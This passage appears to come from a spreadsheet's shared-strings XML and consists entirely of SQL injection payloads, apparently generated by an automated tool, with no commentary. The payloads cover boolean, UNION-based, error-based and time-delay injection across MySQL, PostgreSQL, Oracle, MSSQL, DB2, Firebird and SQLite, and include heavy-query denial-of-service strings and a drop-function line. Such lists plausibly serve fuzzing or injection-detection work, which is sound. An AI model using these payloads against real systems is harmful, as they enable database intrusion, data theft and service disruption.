    <t>call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and "cuzi" like "cuzi</t>
  </si>
  <si>
    <t>1%" and 6408 = 7959--</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</si>
  <si>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</si>
  <si>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  )   )  or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )   and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>1"  )  )   and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and   (  (  "duuw" = "duuw</t>
  </si>
  <si>
    <t>1" )  or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and  ( "vkqt" = "vkqt</t>
  </si>
  <si>
    <t>-6310 or 6715 = 3399</t>
  </si>
  <si>
    <t>-3492" where 4094 = 4094 or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||</t>
  </si>
  <si>
    <t xml:space="preserve">1' and make_set ( 8403 = 8403,8899 ) </t>
  </si>
  <si>
    <t>1" )  and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and  ( "qblj" like "qblj</t>
  </si>
  <si>
    <t>1'+ ( select cjcp where 2590 = 2590 union all select null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t xml:space="preserve">1 and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno ) </t>
  </si>
  <si>
    <t>-5509%"  )  )   )  union all select 7066,7066,7066,7066,7066,7066,7066,7066,7066,7066--</t>
  </si>
  <si>
    <t xml:space="preserve"> end and  ( "%" = "</t>
  </si>
  <si>
    <t>1' )  or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and  ( 'tvcm' = 'tvcm</t>
  </si>
  <si>
    <t>1%" and 9198 = 9198--</t>
  </si>
  <si>
    <t>1'|| ( select 'xsoq' from dual where 6690 = 6690 and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7  )  )  ||'</t>
  </si>
  <si>
    <t>select  ( case when  ( 5163 = 4861 )  then 1 else 5163* ( select 5163 from master..sysdatabases )  end ) --</t>
  </si>
  <si>
    <t>-8841%" )  or 4361 = 1910</t>
  </si>
  <si>
    <t>1" where 8241 = 8241 union all select null,null,null#</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and  ( '%' = '</t>
  </si>
  <si>
    <t>1"  )  )   )  procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 )  and   (  (   ( "whld" = "whld</t>
  </si>
  <si>
    <t>1" )  union all select null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1%'  )  )   or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>1'  )  )   as tfub where 3461 = 3461 or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --</t>
  </si>
  <si>
    <t>1' and 8594 =  ( select 8594 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>1 )  or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 )  = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1' where 8099 = 8099</t>
  </si>
  <si>
    <t>select case when 9390 = 5752 then 1 else null end--</t>
  </si>
  <si>
    <t>1%' or 1022 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>1'+ ( select inrv where 2178 = 2178 or 7417 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>-9225 )  or  ( 8258 = 2726 ) *2726 and  ( 9900 = 9900</t>
  </si>
  <si>
    <t>1" )  where 3679 = 3679</t>
  </si>
  <si>
    <t xml:space="preserve"> end and "mdje" like "mdje</t>
  </si>
  <si>
    <t>1' )  union all select null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1'+ ( select rqcw where 9002 = 9002 union all select null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>-3562" )  as eghl where 7094 = 7094 union all select 7094,7094,7094,7094#</t>
  </si>
  <si>
    <t>-2891 where 1770 = 1770 or 9290 = 5866</t>
  </si>
  <si>
    <t>-6093' )  where 9676 = 9676 union all select 9676,9676,9676,9676,9676,9676--</t>
  </si>
  <si>
    <t>1' or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and 'xqkq' = 'xqkq</t>
  </si>
  <si>
    <t>-3593%' union all select 6346,6346,6346,6346,6346,6346--</t>
  </si>
  <si>
    <t>-7868' in boolean mode )  union all select 5117,5117,5117,5117,5117,5117,5117,5117,5117#</t>
  </si>
  <si>
    <t>1 and elt ( 1210 = 1210,sleep ( 5  )  )  -- ommf</t>
  </si>
  <si>
    <t>1' rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo )  and 'obwn' = 'obwn</t>
  </si>
  <si>
    <t xml:space="preserve"> ( select 1 from generate_series ( 9352,9352,case when  ( 9352 = 9352 )  then 1 else 0 end )  limit 1 ) </t>
  </si>
  <si>
    <t>1 and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 )  = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1' )  where 9544 = 9544 or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )  --</t>
  </si>
  <si>
    <t>select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and   (  (   ( "mubt" = "mubt</t>
  </si>
  <si>
    <t>1"  )  )   as dshc where 9911 = 9911 or 1022 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and   (  (   ( 1105 = 1105</t>
  </si>
  <si>
    <t>-1375'  )  )   )  or  ( 1226 = 9648 ) *9648 and   (  (   ( 'kfoy' like 'kfoy</t>
  </si>
  <si>
    <t>1%' union all select null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>select  ( case when  ( 7096 = 2568 )  then 7096 else 1/ ( select 0 )  end ) --</t>
  </si>
  <si>
    <t>select  ( case when  ( 8808 = 1367 )  then 1 else 8808* ( select 8808 from master..sysdatabases )  end ) --</t>
  </si>
  <si>
    <t>1 where 8398 = 8398</t>
  </si>
  <si>
    <t>1%' or elt ( 5873 = 5873,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>1%' )  and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and  ( '%' = '</t>
  </si>
  <si>
    <t>1' in boolean mode )  and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 )  = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>-2085" )  as hkev where 7730 = 7730 union all select 7730,7730--</t>
  </si>
  <si>
    <t>1%"  )  )   )  and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>1' or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and 'jiyx' = 'jiyx</t>
  </si>
  <si>
    <t>1%" )  union all select null--</t>
  </si>
  <si>
    <t>-3879' union all select 9814,9814,9814,9814,9814,9814,9814,9814,9814--</t>
  </si>
  <si>
    <t>1  )  )   )  and 2716 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>1'|| ( select 'fjlg' from dual where 9517 = 9517</t>
  </si>
  <si>
    <t>select sleep ( 5 )  and   (  (  3404 = 3404</t>
  </si>
  <si>
    <t>1'|| ( select 'ymwf' where 1229 = 1229 or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null  )  )  ||'</t>
  </si>
  <si>
    <t>-7979'+ ( select 'bkvt' where 3613 = 3613 union all select 3613#</t>
  </si>
  <si>
    <t>-6214" union all select 3323,3323#</t>
  </si>
  <si>
    <t>1  )  )   union all select null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1'+ ( select ocvc where 6981 = 6981 union all select null,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1" )  where 9770 = 9770 union all select null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>-8472' )  where 3340 = 3340 or make_set ( 1752 = 9905,9905 ) --</t>
  </si>
  <si>
    <t>1' )  and 7290 = 8416 and  ( 'ktlz' like 'ktlz</t>
  </si>
  <si>
    <t>1" )  and make_set ( 4539 = 6401,6401 )  and  ( "kglx" = "kglx</t>
  </si>
  <si>
    <t>-6593" )  union all select 6216,6216,6216,6216,6216,6216,6216#</t>
  </si>
  <si>
    <t>1"  )  )   as tybm where 2687 = 2687 or elt ( 5873 = 5873,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>1'+ ( select 'njee' where 4101 = 4101 and 3090 = 7873 ) +'</t>
  </si>
  <si>
    <t>1'  )  )   union all select null,null,null,null--</t>
  </si>
  <si>
    <t>-3954'  )  )   union all select 2417,2417--</t>
  </si>
  <si>
    <t>1" where 9973 = 9973 and 2006 = 2006</t>
  </si>
  <si>
    <t>1' )  where 4729 = 4729</t>
  </si>
  <si>
    <t>waitfor delay '0:0:5' and   (  (  7619 = 7619</t>
  </si>
  <si>
    <t>1' and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )   and 'hmqq' = 'hmqq</t>
  </si>
  <si>
    <t>1'  )  )   )  or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --</t>
  </si>
  <si>
    <t>1  )  )   )  or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null )  and   (  (   ( 6583 = 6583</t>
  </si>
  <si>
    <t>1%'  )  )   )  union all select null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1%" )  and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>select case when 8975 = 2352 then 1 else null end--</t>
  </si>
  <si>
    <t>-8319"  )  )   or 7878 = 5970 and   (  (  "jcaz" like "jcaz</t>
  </si>
  <si>
    <t>1' )  union all select null,null,null,null--</t>
  </si>
  <si>
    <t>1'|| ( select 'yuku' where 7480 = 7480</t>
  </si>
  <si>
    <t>1%' or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and '%' = '</t>
  </si>
  <si>
    <t>-6667%"  )  )   union all select 7348,7348,7348,7348,7348,7348,7348,7348#</t>
  </si>
  <si>
    <t>-6746" )  or  ( 8459 = 8459 ) *4906 and  ( "kohi" like "kohi</t>
  </si>
  <si>
    <t>1'|| ( select 'xhqy' where 4531 = 4531 union all select null,null--</t>
  </si>
  <si>
    <t>-7239' or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and 'cswv' = 'cswv</t>
  </si>
  <si>
    <t>1" )  or elt ( 6272 = 6272,sleep ( 5  )  )   and  ( "dplf" like "dplf</t>
  </si>
  <si>
    <t>1' or sleep ( 5 ) #</t>
  </si>
  <si>
    <t xml:space="preserve"> end and  ( 'nchh' = 'nchh</t>
  </si>
  <si>
    <t>-4148%"  )  )   )  or  ( 8459 = 8459 ) *4906 and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>1"  )  )   as ydkd where 2455 = 2455 and sleep ( 5 ) --</t>
  </si>
  <si>
    <t>1'+ ( select tzvm where 5145 = 5145 and 4192 = 7437#</t>
  </si>
  <si>
    <t>1" )  and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and  ( "liar" = "liar</t>
  </si>
  <si>
    <t>select  ( case when  ( 9931 = 3424 )  then 1 else 9931* ( select 9931 from master..sysdatabases )  end ) --</t>
  </si>
  <si>
    <t>1 )  where 3076 = 3076 union all select null,null,null,null,null--</t>
  </si>
  <si>
    <t>1  )  )   )  union all select null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1%' )  or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 )  = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1%" )  and 8715 = 5529</t>
  </si>
  <si>
    <t>select  ( case when  ( 9816 = 1693 )  then 9816 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual--</t>
  </si>
  <si>
    <t>1 )  as usnn where 3201 = 3201</t>
  </si>
  <si>
    <t>1'|| ( select 'hwdj' where 8179 = 8179</t>
  </si>
  <si>
    <t>1' or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )   and 'eznq' like 'eznq</t>
  </si>
  <si>
    <t>1" )  and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )   and  ( "vxec" like "vxec</t>
  </si>
  <si>
    <t xml:space="preserve">1' or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   ) </t>
  </si>
  <si>
    <t>1" )  where 4739 = 4739 or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   ) --</t>
  </si>
  <si>
    <t>if ( 9431 = 6730 )  select 9431 else drop function xbkh--</t>
  </si>
  <si>
    <t>-6890'  )  )   or 5771 = 7721--</t>
  </si>
  <si>
    <t xml:space="preserve"> ( select 2412 =  ( 'qqpjq'|| ( select case 2412 when 2412 then 1 else 0 end from rdb$database ) ||'qzvzq'  )  )  </t>
  </si>
  <si>
    <t>1  )  )   as ewlg where 3722 = 3722 rlike sleep ( 5 ) --</t>
  </si>
  <si>
    <t>1  )  )   )  or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )   and   (  (   ( 8671 = 8671</t>
  </si>
  <si>
    <t>-9688%'  )  )   )  or elt ( 3695 = 7995,7995 )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and  ( 8503 = 8503</t>
  </si>
  <si>
    <t>select benchmark ( 5000000,md5 ( 0x4c4d6142  )  )   and   (  (  "vcvb" like "vcvb</t>
  </si>
  <si>
    <t>-2701"  )  )   as wvht where 5401 = 5401 union all select 5401,5401,5401,5401,5401,5401,5401,5401#</t>
  </si>
  <si>
    <t>1" )  as rcnk where 1800 = 1800</t>
  </si>
  <si>
    <t>1 where 2674 = 2674 and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>-5945'  )  )   )  union all select 4266,4266,4266,4266,4266--</t>
  </si>
  <si>
    <t>1%'  )  )   )  rlike  ( select * from  ( select ( sleep ( 5  )  )   ) vwyq ) #</t>
  </si>
  <si>
    <t>1' in boolean mode )  and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) #</t>
  </si>
  <si>
    <t>1 )  where 7600 = 7600 union all select null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1"  )  )   rlike sleep ( 5 )  and   (  (  "ahhx" like "ahhx</t>
  </si>
  <si>
    <t>select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and   (  (  "swec" like "swec</t>
  </si>
  <si>
    <t>1'  )  )   )  and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (   ( 'qfvg' = 'qfvg</t>
  </si>
  <si>
    <t>-6129 union all select 9122,9122#</t>
  </si>
  <si>
    <t xml:space="preserve">1, ( select * from generate_series ( 5609,5609,case when  ( 5609 = 5609 )  then 1 else 0 end )  limit 1 ) </t>
  </si>
  <si>
    <t>1'|| ( select 'wqmz' where 6400 = 6400 and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x  )  )  ||'</t>
  </si>
  <si>
    <t>-5998%" )  union all select 2366,2366,2366,2366#</t>
  </si>
  <si>
    <t>-7945%'  )  )   )  union all select 4286,4286,4286,4286,4286,4286--</t>
  </si>
  <si>
    <t>select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>1'  )  )   and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and   (  (  'ygfv' = 'ygfv</t>
  </si>
  <si>
    <t>-2612" )  as iwfj where 3231 = 3231 or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr (</t>
  </si>
  <si>
    <t xml:space="preserve">iif ( 8354 = 3515,1,1/0 ) </t>
  </si>
  <si>
    <t>1' and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and 'zetf' = 'zetf</t>
  </si>
  <si>
    <t>-7559" or 8792 = 6905--</t>
  </si>
  <si>
    <t>1" )  as vcir where 6275 = 6275 and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 )  = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>-2734' )  union all select 5510,5510,5510,5510,5510#</t>
  </si>
  <si>
    <t>-9337 )  union all select 5648,5648,5648,5648,5648#</t>
  </si>
  <si>
    <t>1 )  as nsdy where 7513 = 7513</t>
  </si>
  <si>
    <t>select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 and  ( 'fnon' like 'fnon</t>
  </si>
  <si>
    <t>1' )  where 7252 = 7252</t>
  </si>
  <si>
    <t>1 where 9404 = 9404</t>
  </si>
  <si>
    <t>1" )  where 5129 = 5129 order by 1--</t>
  </si>
  <si>
    <t>select  ( case when  ( 7997 = 1543 )  then 7997 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual--</t>
  </si>
  <si>
    <t>-2276"  )  )   as qwow where 2321 = 2321 or 3534 = 2971--</t>
  </si>
  <si>
    <t>1 where 2382 = 2382</t>
  </si>
  <si>
    <t xml:space="preserve">1 )  and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  </t>
  </si>
  <si>
    <t>1' where 4149 = 4149 and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>1%'  )  )   or 2367 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>-3819'  )  )   )  union all select 9014,9014,9014,9014,9014,9014--</t>
  </si>
  <si>
    <t>-3137'|| ( select 'btif' where 1718 = 1718 union all select 1718,1718,1718,1718,1718,1718,1718,1718,1718#</t>
  </si>
  <si>
    <t>1'|| ( select 'zccb' from dual where 8911 = 8911</t>
  </si>
  <si>
    <t>1' and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 )  and 'hzav' = 'hzav</t>
  </si>
  <si>
    <t>1' union all select null#</t>
  </si>
  <si>
    <t>1%' )  and 2716 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>1'  )  )   as atpy where 9020 = 9020 or 4915 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>1%"  )  )   )  and 3580 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>-1886' where 5518 = 5518 or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||ch</t>
  </si>
  <si>
    <t>-5555  )  )   as ldte where 4583 = 4583 order by 1#</t>
  </si>
  <si>
    <t>1 )  or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and  ( 9112 = 9112</t>
  </si>
  <si>
    <t>1" )  where 6018 = 6018 and 7533 = 7533--</t>
  </si>
  <si>
    <t>1 )  where 8232 = 8232 and  ( 3020 = 3020 ) *6703--</t>
  </si>
  <si>
    <t>1'  )  )   as vdhw where 8858 = 8858 order by 1#</t>
  </si>
  <si>
    <t>1'  )  )   )  and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and   (  (   ( 'wzdo' = 'wzdo</t>
  </si>
  <si>
    <t>1%" and 8189 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>-1376%"  )  )   )  or 3458 = 9503 and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>1" and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )  and "exgr" like "exgr</t>
  </si>
  <si>
    <t>1%'  )  )   )  and 3916 = 6327--</t>
  </si>
  <si>
    <t>-3496'  )  )   or 9323 = 9323#</t>
  </si>
  <si>
    <t>1' where 7353 = 7353 or 8156 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>1" where 5440 = 5440 and 8189 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t xml:space="preserve"> select sleep ( 5 ) #</t>
  </si>
  <si>
    <t>1'  )  )   )  and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 )  and   (  (   ( 'gwew' like 'gwew</t>
  </si>
  <si>
    <t>-5798" or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 11</t>
  </si>
  <si>
    <t>1" where 1719 = 1719 and 7533 = 7533--</t>
  </si>
  <si>
    <t>-4960 union all select 4031,4031#</t>
  </si>
  <si>
    <t>1'|| ( select 'jlka' where 5436 = 5436 or 4915 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>1"  )  )   and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --</t>
  </si>
  <si>
    <t>1'  )  )   )  and elt ( 9501 = 8427,8427 )  and   (  (   ( 'ahpp' = 'ahpp</t>
  </si>
  <si>
    <t>1'+ ( select soqk where 5383 = 5383</t>
  </si>
  <si>
    <t>1 )  where 1013 = 1013 and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>1'  )  )   )  and 3602 = 1990#</t>
  </si>
  <si>
    <t>-2174'  )  )   as zhoz where 4185 = 4185 order by 1#</t>
  </si>
  <si>
    <t>1'|| ( select 'tznb' from dual where 8808 = 8808 rlike  ( select * from  ( select ( sleep ( 5  )  )   ) vwyq ) #</t>
  </si>
  <si>
    <t>1' )  as hats where 2011 = 2011 union all select null,null,null,null,null#</t>
  </si>
  <si>
    <t>1' )  procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 )  and  ( 'szib' like 'szib</t>
  </si>
  <si>
    <t>1 )  where 7552 = 7552 order by 1#</t>
  </si>
  <si>
    <t>1 )  as wxms where 7272 = 7272 and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>-6626%" )  or 1744 = 5292 and  ( "%" = "</t>
  </si>
  <si>
    <t>1'  )  )   )  and 7533 = 7533 and   (  (   ( 'suzd' like 'suzd</t>
  </si>
  <si>
    <t xml:space="preserve">1 )  or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   ) </t>
  </si>
  <si>
    <t>-4015" where 2610 = 2610 or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t>-5291'  )  )   or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr (</t>
  </si>
  <si>
    <t>-9264' )  or 8571 = 8571--</t>
  </si>
  <si>
